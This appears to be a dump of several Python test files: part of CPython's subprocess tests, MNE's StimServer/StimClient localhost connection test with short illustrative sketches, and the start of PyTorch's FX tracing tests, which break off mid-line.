p.stdout.read(1) # The process should end after this time.sleep(1) # This shouldn't raise even though the child is now dead getattr(p, method)(*args) _, stderr = p.communicate() self.assertStderrEqual(stderr, b'') rc = p.wait() self.assertEqual(rc, 42) def test_send_signal(self): self._kill_process('send_signal', signal.SIGTERM) def test_kill(self): self._kill_process('kill') def test_terminate(self): self._kill_process('terminate') def test_send_signal_dead(self): self._kill_dead_process('send_signal', signal.SIGTERM) def test_kill_dead(self): self._kill_dead_process('kill') def test_terminate_dead(self): self._kill_dead_process('terminate') class CommandTests(unittest.TestCase): def test_getoutput(self): self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy') self.assertEqual(subprocess.getstatusoutput('echo xyzzy'), (0, 'xyzzy')) # we use mkdtemp in the next line to create an empty directory # under our exclusive control; from that, we can invent a pathname # that we _know_ won't exist. This is guaranteed to fail. dir = None try: dir = tempfile.mkdtemp() name = os.path.join(dir, "foo") status, output = subprocess.getstatusoutput( ("type " if mswindows else "cat ") + name) self.assertNotEqual(status, 0) finally: if dir is not None: os.rmdir(dir) @unittest.skipUnless(hasattr(selectors, 'PollSelector'), "Test needs selectors.PollSelector") class ProcessTestCaseNoPoll(ProcessTestCase): def setUp(self): self.orig_selector = subprocess._PopenSelector subprocess._PopenSelector = selectors.SelectSelector ProcessTestCase.setUp(self) def tearDown(self): subprocess._PopenSelector = self.orig_selector ProcessTestCase.tearDown(self) class HelperFunctionTests(unittest.TestCase): @unittest.skipIf(mswindows, "errno and EINTR make no sense on windows") def test_eintr_retry_call(self): record_calls = [] def fake_os_func(*args): record_calls.append(args) if len(record_calls) == 2: raise OSError(errno.EINTR, "fake interrupted system call") return tuple(reversed(args)) self.assertEqual((999, 256), subprocess._eintr_retry_call(fake_os_func, 256, 999)) self.assertEqual([(256, 999)], record_calls) # This time there will be an EINTR so it will loop once. 
self.assertEqual((666,), subprocess._eintr_retry_call(fake_os_func, 666)) self.assertEqual([(256, 999), (666,), (666,)], record_calls) @unittest.skipUnless(mswindows, "Windows-specific tests") class CommandsWithSpaces (BaseTestCase): def setUp(self): super().setUp() f, fname = mkstemp(".py", "te st") self.fname = fname.lower () os.write(f, b"import sys;" b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))" ) os.close(f) def tearDown(self): os.remove(self.fname) super().tearDown() def with_spaces(self, *args, **kwargs): kwargs['stdout'] = subprocess.PIPE p = subprocess.Popen(*args, **kwargs) self.addCleanup(p.stdout.close) self.assertEqual( p.stdout.read ().decode("mbcs"), "2 [%r, 'ab cd']" % self.fname ) def test_shell_string_with_spaces(self): # call() function with string argument with spaces on Windows self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname, "ab cd"), shell=1) def test_shell_sequence_with_spaces(self): # call() function with sequence argument with spaces on Windows self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1) def test_noshell_string_with_spaces(self): # call() function with string argument with spaces on Windows self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname, "ab cd")) def test_noshell_sequence_with_spaces(self): # call() function with sequence argument with spaces on Windows self.with_spaces([sys.executable, self.fname, "ab cd"]) class ContextManagerTests(BaseTestCase): def test_pipe(self): with subprocess.Popen([sys.executable, "-c", "import sys;" "sys.stdout.write('stdout');" "sys.stderr.write('stderr');"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc: self.assertEqual(proc.stdout.read(), b"stdout") self.assertStderrEqual(proc.stderr.read(), b"stderr") self.assertTrue(proc.stdout.closed) self.assertTrue(proc.stderr.closed) def test_returncode(self): with subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(100)"]) as proc: pass # __exit__ calls wait(), so the returncode should be set self.assertEqual(proc.returncode, 100) def test_communicate_stdin(self): with subprocess.Popen([sys.executable, "-c", "import sys;" "sys.exit(sys.stdin.read() == 'context')"], stdin=subprocess.PIPE) as proc: proc.communicate(b"context") self.assertEqual(proc.returncode, 1) def test_invalid_args(self): with self.assertRaises(FileNotFoundError) as c: with subprocess.Popen(['nonexisting_i_hope'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc: pass def test_broken_pipe_cleanup(self): """Broken pipe error should not prevent wait() (Issue 21619)""" proc = subprocess.Popen([sys.executable, '-c', 'pass'], stdin=subprocess.PIPE, bufsize=support.PIPE_MAX_SIZE*2) proc = proc.__enter__() # Prepare to send enough data to overflow any OS pipe buffering and # guarantee a broken pipe error. Data is held in BufferedWriter # buffer until closed. proc.stdin.write(b'x' * support.PIPE_MAX_SIZE) self.assertIsNone(proc.returncode) # EPIPE expected under POSIX; EINVAL under Windows self.assertRaises(OSError, proc.__exit__, None, None, None) self.assertEqual(proc.returncode, 0) self.assertTrue(proc.stdin.closed) def test_main(): unit_tests = (ProcessTestCase, POSIXProcessTestCase, Win32ProcessTestCase, CommandTests, ProcessTestCaseNoPoll, HelperFunctionTests, CommandsWithSpaces, ContextManagerTests, ) support.run_unittest(*unit_tests) support.reap_children() if __name__ == "__main__": unittest.main()
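# --- illustrative sketch (not part of the test suite above) ---
# Minimal example of the behaviour exercised by ContextManagerTests:
# using Popen as a context manager closes the pipes on exit and wait()s
# on the child, so returncode is available right after the block.
# Only the standard library is used; the child code is arbitrary.
import subprocess
import sys

with subprocess.Popen([sys.executable, "-c",
                       "import sys; sys.stdout.write('ok'); sys.exit(7)"],
                      stdout=subprocess.PIPE,
                      stderr=subprocess.PIPE) as proc:
    out, err = proc.communicate()      # drains both pipes and waits

assert out == b"ok" and err == b""
assert proc.returncode == 7            # __exit__ has already wait()ed
assert proc.stdout.closed and proc.stderr.closed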
test_stim_client_server.py
import threading import time import pytest from mne.realtime import StimServer, StimClient from mne.externals.six.moves import queue from mne.utils import requires_good_network, run_tests_if_main _server = None _have_put_in_trigger = False _max_wait = 10. @requires_good_network def test_connection(): """Test TCP/IP connection for StimServer <-> StimClient.""" global _server, _have_put_in_trigger # have to start a thread to simulate the effect of two # different computers since stim_server.start() is designed to # be a blocking method # use separate queues because timing matters trig_queue1 = queue.Queue() trig_queue2 = queue.Queue() # start a thread to emulate 1st client thread1 = threading.Thread(target=_connect_client, args=(trig_queue1,)) thread1.daemon = True # start another thread to emulate 2nd client thread2 = threading.Thread(target=_connect_client, args=(trig_queue2,)) thread2.daemon = True thread1.start() thread2.start() with StimServer(port=4218, n_clients=2) as stim_server: _server = stim_server stim_server.start(timeout=10.0) # don't allow test to hang # Add the trigger to the queue for both clients stim_server.add_trigger(20) _have_put_in_trigger = True # monkey patch # the assert_equal must be in the test_connection() method # Hence communication between threads is necessary trig1 = trig_queue1.get(timeout=_max_wait) trig2 = trig_queue2.get(timeout=_max_wait) assert trig1 == 20 # test if both clients receive the same trigger assert trig1 == trig2 # test timeout for stim_server with StimServer(port=4218) as stim_server: pytest.raises(StopIteration, stim_server.start, 0.1) def _connect_client(trig_queue): """Instantiate the StimClient.""" # just wait till the main thread reaches stim_server.start() t0 = time.time() while (time.time() - t0 < _max_wait and (_server is None or not _server._running)): time.sleep(0.01) assert _server is not None and _server._running # instantiate StimClient stim_client = StimClient('localhost', port=4218) # wait for script to reach stim_server.add_trigger() t0 = time.time() while (time.time() - t0 < _max_wait and not _have_put_in_trigger): time.sleep(0.01) assert _have_put_in_trigger trig_queue.put(stim_client.get_trigger()) stim_client.close() run_tests_if_main()
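# --- illustrative sketch (not part of the test module above) ---
# Condensed version of the round trip exercised by test_connection():
# the client runs in a daemon thread because stim_server.start() blocks
# until the expected number of clients has connected.  As in the test,
# the client polls the server's (private) _running flag before
# connecting, and a threading.Event stands in for the
# _have_put_in_trigger global.  The helper names (_client, received,
# trigger_added, state) are made up for this sketch; it assumes
# mne.realtime is importable and that TCP port 4218 is free locally.
import threading
import time

from mne.realtime import StimServer, StimClient

state = {'server': None}        # shared with the client thread
trigger_added = threading.Event()
received = []


def _client():
    # wait until the server is actually listening before connecting
    while state['server'] is None or not state['server']._running:
        time.sleep(0.01)
    client = StimClient('localhost', port=4218)
    trigger_added.wait(timeout=10.0)   # wait until a trigger was queued
    received.append(client.get_trigger())
    client.close()


thread = threading.Thread(target=_client)
thread.daemon = True
thread.start()

with StimServer(port=4218, n_clients=1) as server:
    state['server'] = server
    server.start(timeout=10.0)     # returns once the client has connected
    server.add_trigger(20)         # queue trigger value 20 for the client
    trigger_added.set()
    thread.join(timeout=10.0)

assert received == [20]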
test_fx.py
# Owner(s): ["oncall: fx"] import builtins import contextlib import copy import functools import inspect import math import numbers import operator import os import pickle import sys import torch import traceback import typing import types import warnings import unittest from math import sqrt from torch.multiprocessing import Process from torch.testing import FileCheck from torch.testing._internal.common_methods_invocations import op_db from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests import torch.utils._pytree as pytree import torch.fx._pytree as fx_pytree from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH from torch.fx.node import Target, Argument from torch.fx.passes import shape_prop from torch.fx.immutable_collections import immutable_dict, immutable_list from torch.fx.experimental.rewriter import RewritingTracer from torch.fx.operator_schemas import get_signature_for_torch_op from copy import deepcopy from collections import namedtuple from torch.fx.proxy import TraceError from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401 from fx.test_dce_pass import TestDCE # noqa: F401 from fx.test_fx_const_fold import TestConstFold # noqa: F401 from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import AnnotationsTest # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import TypeCheckerTest # noqa: F401 from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union from torch.testing._internal.common_utils import ( IS_FBCODE, IS_MACOS, IS_WINDOWS, TEST_WITH_ROCM, find_library_location, run_tests, ) from torch.testing._internal.jit_utils import JitTestCase from fx.named_tup import MyNamedTup try: from torchvision import models as torchvision_models HAS_TORCHVISION = True except ImportError: HAS_TORCHVISION = False skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision") class SimpleTest(torch.nn.Module): def forward(self, x): return torch.relu(x + 3.0) def a_non_torch_leaf(a, b): return a + b # Used for test_autowrap_function. Autowrapped functions need to be global def fx_int(x: float) -> int: return int(x) def fx_int_x2(x: float) -> int: return int(x) * 2 # used in test_pytree. 
It's all the way out here because pickling a GraphModule # that uses Point errors out if Point is local to the function Point = namedtuple('Point', ['x', 'y']) # Test wrap() passing both a function name as well as a function # directly def a_lifted_leaf(a, b): return a[0] + a[1] + b wrap('a_lifted_leaf') # Test wrapping twice doesn't break anything wrap('a_lifted_leaf') def a_lifted_leaf2(a, b): return a[0] + a[1] + b wrap(a_lifted_leaf2) wrap('len') wrap('getattr') @wrap def wrapped_via_decorator(a): return a + 1 wrap('wrapped_with_submodule') def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d): return batchnorm1d(x) real_wrapped_via_decorator = wrapped_via_decorator real_a_lifed_leaf = a_lifted_leaf real_a_lifed_leaf2 = a_lifted_leaf2 _sqrt = sqrt wrap('wrapper_fn') def wrapper_fn(x): return torch.foo(x) class Pair(NamedTuple): x : torch.Tensor y : torch.Tensor # for testing pytrees class Foo(object): # noqa: B209 def __init__(self, a, b): self.a = a self.b = b class TestFX(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS): lib_file_path = find_library_location('libtorchbind_test.so') torch.ops.load_library(str(lib_file_path)) def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None): """Check that an nn.Module's results match the GraphModule version for a given set of args/kwargs. """ kwargs = kwargs if kwargs else {} ref_outs = m(*args, **kwargs) gm = symbolic_trace(m) gm.graph.lint() test_outs = gm(*args, **kwargs) self.assertEqual(ref_outs, test_outs) def test_graph_module(self): class MySub(torch.nn.Module): def __init__(self): super().__init__() self.w = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.w + x class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.lin = torch.nn.Linear(4, 3) self.sub_mod = MySub() self.w = torch.nn.Parameter(torch.rand(3)) def forward(self, A, B, c): t = torch.sigmoid(A) + self.lin(c) return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3)) m = MyModule() gm = symbolic_trace(m) ms = torch.jit.script(gm) class M2(torch.nn.Module): def forward(self, A): m, idx = torch.max(A, 0) return m + 1, idx + 1 m2 = M2() gm2 = symbolic_trace(m2) class T(torch.nn.Module): def forward(self, A, b=4, *args, c=5, **kwargs): x = A + 1 + args[0] + kwargs['3'] return x t = T() symbolic_trace(t) # test for issue described at https://github.com/pytorch/pytorch/issues/63883 class M3(torch.nn.Module): def forward(self, x): return torch.relu(x) m3 = M3() gm3 = symbolic_trace(m3) new_instance = gm3.__new__(type(gm3)) new_instance.__init__(gm3, gm3.graph) x = torch.randn(5, 3) torch.testing.assert_allclose(new_instance(x), torch.relu(x)) def test_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) x, y = torch.rand(1), torch.rand(1) self.assertEqual(torch.sin(x + y), gm(x, y)) def test_args_kwargs(self): class T(torch.nn.Module): def forward(self, *args, **kwargs): x = args[0] + kwargs['foo'] 
return x t = T() self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_args_kwargs_no_self(self): class T(torch.nn.Module): def forward(*args, **kwargs): # noqa: B902 self = args[0] return torch.relu(args[1]) t = T() with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'): self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_fx_shifts(self): class MyModule(torch.nn.Module): def forward(self, x): return x << 3, x >> 3 input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_fx_and_or(self): class MyModule(torch.nn.Module): def forward(self, x): return x & x, x | x input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_dict(self): class MyDictMod(torch.nn.Module): def forward(self, d): return d['3'].relu(), {'4' : d['3'].neg()} input_dict = {'3': torch.rand(3, 4)} m = MyDictMod() self.checkGraphModule(m, (input_dict,)) def test_matmul_tracing(self): const = torch.randn(3) def matmul_f(x): return x @ const mod = symbolic_trace(matmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), matmul_f(inp)) def rmatmul_f(x): return const @ x mod = symbolic_trace(rmatmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), rmatmul_f(inp)) def test_disallow_override(self): # Custom delegate to disallow in-place tensor operations class NoMutableCallTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: name = target if isinstance(target, str) else torch.typename(target) if name[-1] == '_': raise RuntimeError('In-place operations are not supported') return super().create_node(kind, target, args, kwargs, name) # Test method class MyInplaceMod(torch.nn.Module): def forward(self, x): x.add_(3.0) return x m = MyInplaceMod() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m) # Test free function class MyInplaceMod2(torch.nn.Module): def forward(self, x): torch.log_(x) return x m2 = MyInplaceMod2() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m2) # Test symbolic node as an arg class MyInplaceMod3(torch.nn.Module): def forward(self, x): y = torch.ones(3, 4) y.add_(x) return x m3 = MyInplaceMod3() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m3) def test_leaf_module(self): # Custom delegate to make it so that there are no leaf modules, everything # should get traced through class NoLeafModulesTracer(Tracer): def is_leaf_module(self, m, qualname): return False class MyReluMod(torch.nn.Module): def __init__(self): super().__init__() self.relu = torch.nn.ReLU() def forward(self, x): return self.relu(x) mrm = MyReluMod() sym = NoLeafModulesTracer().trace(mrm) for node in sym.nodes: self.assertNotEqual(node.op, 'call_module') sym.lint() def test_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, 
y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf2', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_wrapped_via_decorator(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(m).transform() self.assertIn('wrapped_via_decorator', transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) m = symbolic_trace(M()) self.assertIn("wrapped_with_submodule", m.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), m(input)) def test_wrapped_retrace(self): def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) retraced = symbolic_trace(m) self.assertIn('wrapped_via_decorator', retraced.code) self.assertEqual(retraced(0), 1) def test_graph_edit_with_proxy(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. new_g.output((t + t).node) gm = GraphModule(m, new_g) gm.graph.lint() self.assertEqual(gm(3, 4), 14) def test_graph_unique_names(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. 
new_g.output((t + t).node) gm = GraphModule(m, new_g) seen_names : Set[str] = set() for node in gm.graph.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_stack_traces(self): class M(torch.nn.Module): def forward(self, a, b): return a + b tracer = torch.fx.Tracer() tracer.record_stack_traces = True graph = tracer.trace(M()) for node in graph.nodes: if node.op == 'output': continue self.assertTrue(node.stack_trace is not None) assert 'test_fx.py' in node.stack_trace def test_graph_unique_names_manual(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1') c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) graph2 = torch.fx.Graph() val_map : Dict[Node, Node] = {} graph2.graph_copy(graph, val_map) seen_names : Set[str] = set() for node in graph2.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_unpack(self): class M(torch.nn.Module): def forward(self, a, b): c, d = a return c + d + b a = (torch.rand(1), torch.rand(1)) b = torch.rand(1) m = M() self.checkGraphModule(m, (a, b)) def test_native_callable(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: raise unittest.SkipTest("non-portable load_library call used in test") # This test exercises the case where we use FX to translate from Python # code to some native callable object # # For the purposes of testing, we use ElementwiseInterpreter defined # in test_custom_class.cpp. # # We test that we can # 1) Construct a native callable from FX IR # 2) Construct a drop-in replacement module that delegates to the # native callable rather than the original code # 3) Run both the original code and native callable wrapper with # equivalent results # 4) TorchScript compile the native callable wrapper and confirm # equivalent results with the reference # 5) TorchScript serialize and deserialize the native callable # and confirm equivalent results with the reference # We use this simple Module as a reference computation class MySimpleMod(torch.nn.Module): def forward(self, x): return 3.0 * x + x msm = MySimpleMod() # This is what a lowering pass might look like: a function that takes # a valid nn.Module, symbolically traces it, lowers the Module to some # representation, and wraps that representation up into another # nn.Module instance that handles dispatch to the compiled/lowered code. def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module: # ===== Stage 1: Symbolic trace the module ===== mod = symbolic_trace(orig_mod) # ===== Stage 2: Lower GraphModule representation to the C++ # interpreter's instruction format ====== instructions = [] constant_idx = 0 constants = {} fn_input_names = [] target_to_name = { operator.add : "add", operator.mul : "mul" } output_node : Optional[Node] = None # For each instruction, create a triple # (instruction_name : str, inputs : List[str], output : str) # to feed into the C++ interpreter for n in mod.graph.nodes: target, args, out_name = n.target, n.args, n.name assert len(n.kwargs) == 0, "kwargs currently not supported" if n.op == 'placeholder': # Placeholders specify function argument names. 
Save these # for later when we generate the wrapper GraphModule fn_input_names.append(target) elif n.op == 'call_function': assert target in target_to_name, "Unsupported call target " + target arg_names = [] for arg in args: if not isinstance(arg, Node): # Pull out constants. These constants will later be # fed to the interpreter C++ object via add_constant() arg_name = f'constant_{constant_idx}' constants[arg_name] = torch.tensor( [arg] if isinstance(arg, numbers.Number) else arg) arg_names.append(arg_name) constant_idx += 1 else: arg_names.append(arg.name) instructions.append((target_to_name[target], arg_names, out_name)) elif n.op == 'output': if output_node is not None: raise RuntimeError('Multiple output nodes!') output_node = n else: raise RuntimeError('Unsupported opcode ' + n.op) interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter() # Load constants for k, v in constants.items(): interpreter.add_constant(k, v) # Specify names for positional input arguments interpreter.set_input_names(fn_input_names) # Load instructions interpreter.set_instructions(instructions) # Specify name for single output assert isinstance(output_node.args[0], torch.fx.Node) interpreter.set_output_name(output_node.args[0].name) # ===== Stage 3: Create a wrapper GraphModule around the interpreter ===== class WrapperModule(torch.nn.Module): def __init__(self, interpreter): super().__init__() self.interpreter = interpreter wrapper = WrapperModule(interpreter) # Create a graph that: 1) Takes function arguments 2) Invokes the interpreter # 3) Returns the speficied return value # FIXME: The following code could be greatly simplified by symbolic_trace'ing # the wrapper with a Tracer that considers the Wrapper instance a root # module, however, I can't get `__call__` exposed on TorchBind classes # without it messing up Python `hasattr` for some reason. More digging # into CPython's implementation of hasattr is probably in order... graph = torch.fx.Graph() # Add placeholders for fn inputs placeholder_nodes = [] for name in fn_input_names: placeholder_nodes.append(graph.create_node('placeholder', name)) # Get the interpreter object interpreter_node = graph.create_node('get_attr', 'interpreter') # Add a node to call the interpreter instance output_node = graph.create_node( op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes)) # Register output graph.output(output_node) graph.lint() # Return final GraphModule!!! 
return GraphModule(wrapper, graph) # Lower GraphModule to C++ interpreter lowered = lower_to_elementwise_interpreter(msm) # Compare correctness with original module x = torch.rand(3, 4) ref_out = msm(x) test_out = lowered(x) torch.testing.assert_close(test_out, ref_out) # Test TorchScript compilation scripted_lowered = torch.jit.script(lowered) script_out = scripted_lowered(x) torch.testing.assert_close(script_out, ref_out) # Test TorchScript ser/de import_copy = self.getExportImportCopy(scripted_lowered) imported_out = import_copy(x) torch.testing.assert_close(imported_out, ref_out) def test_reserved_getattr(self): """Ensure that we do not name any nodes with a reserved builtin like `getattr`""" class M(torch.nn.Module): def forward(self, a): return a.foo.bar.baz m = M() m_g = symbolic_trace(m) m_g.graph.lint() for node in m_g.graph.nodes: self.assertTrue(node.name != "getattr") def test_node_tagging(self): class TaggingTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: n = super().create_node(kind, target, args, kwargs, name) n.tag = 'foo' return n class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = TaggingTracer().trace(m) g.lint() for n in g.nodes: self.assertTrue(hasattr(n, 'tag')) self.assertEqual(n.tag, 'foo') def test_tensor_attribute(self): class TensorAttribute(torch.nn.Module): def __init__(self): super().__init__() self.tensor = torch.rand(3, 4) def forward(self, x): return torch.nn.functional.linear(x, self.tensor) ta = TensorAttribute() traced = symbolic_trace(ta) traced(torch.rand(4, 4)) class WrapperForQualname(torch.nn.Module): def __init__(self): super().__init__() self.ta = TensorAttribute() def forward(self, x): return torch.nn.functional.linear(x, self.ta.tensor) wfq = WrapperForQualname() traced2 = symbolic_trace(wfq) traced2.graph.lint() traced2(torch.rand(4, 4)) def test_tensor_attribute_coalseced(self): def count_attrs(fx_module): targets = set() for node in traced.graph.nodes: if node.op == 'get_attr': targets.add(node.target) return len(targets) val = torch.tensor(5) def f(x): return x + val + val traced = symbolic_trace(f) traced.graph.lint() self.assertEqual(count_attrs(traced), 1) val2 = torch.tensor(5) def f(x): val = torch.tensor(5) return x + val + val2 traced = symbolic_trace(f) traced.graph.lint() self.assertEqual(count_attrs(traced), 2) def test_symbolic_trace_sequential(self): class Simple(torch.nn.Module): def forward(self, x): return torch.neg(x) seq = torch.nn.Sequential( Simple(), Simple(), Simple() ) traced = symbolic_trace(seq) traced.graph.lint() x = torch.rand(3, 4) self.assertEqual(traced(x), seq(x)) def test_tensor_constant(self): class ConstTensor(torch.nn.Module): def forward(self, x): return torch.nn.functional.linear(x, torch.zeros(3, 4)) ct = ConstTensor() traced = symbolic_trace(ct) traced.graph.lint() traced(torch.rand(4, 4)) def test_pickle_graphmodule(self): class Nested(torch.nn.Module): def __init__(self): super().__init__() self.st = torch.nn.Linear(4, 4) def forward(self, x): return self.st(x) n = Nested() traced = symbolic_trace(n) traced.graph.lint() pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() x = torch.rand(3, 4) self.assertEqual(loaded(x), traced(x)) def test_pickle_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) 
d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) loaded.graph.lint() x, y = torch.rand(1), torch.rand(1) self.assertEqual(loaded(x, y), gm(x, y)) def test_all_input_nodes(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.placeholder('x') b : torch.fx.Node = graph.call_module('linear_mod', args=(a,)) c : torch.fx.Node = graph.get_attr('y_attr') d : torch.fx.Node = graph.call_function(operator.add, args=(b, c)) e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0)) graph.output(e) graph.lint() self.assertEqual(b.all_input_nodes, [a]) self.assertEqual(c.all_input_nodes, []) self.assertEqual(d.all_input_nodes, [b, c]) self.assertEqual(e.all_input_nodes, [d]) def test_deepcopy_graphmodule_with_transform(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() def transform(traced): new_graph = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_value = new_graph.graph_copy(traced.graph, val_map) relu_out = new_graph.create_node( op='call_method', target='neg', args=(output_value,), kwargs={}) new_graph.output(relu_out) return GraphModule(traced, new_graph) transformed = transform(traced) transformed.graph.lint() copied = copy.deepcopy(transformed) self.assertNotEqual(id(type(transformed)), id(type(copied))) x = torch.randn(3, 4) self.assertEqual(copied(x), transformed(x)) def test_deepcopy_with_submods_params(self): class Bar(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) def forward(self, x): return torch.relu(x) + self.param class Baz(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.bar = Bar() def forward(self, x): return self.bar(x) - self.param baz = Baz() traced = symbolic_trace(baz) traced.graph.lint() copied = copy.deepcopy(traced) copied.graph.lint() def test_deepcopy_graph_with_tracer_cls(self): class TestTracer(Tracer): def is_leaf_module(self, module, name): return True g = Graph(tracer_cls=TestTracer) x = g.placeholder("x") g.output(x) h = copy.deepcopy(g) self.assertIsNotNone(h._tracer_cls) self.assertTrue(g._tracer_cls == h._tracer_cls) def test_unpack_list_better_error(self): class SomeArgs(torch.nn.Module): def forward(self, a, b): return torch.rand(3, 4) class UnpacksList(torch.nn.Module): def __init__(self): super().__init__() self.sa = SomeArgs() def forward(self, x : list): return 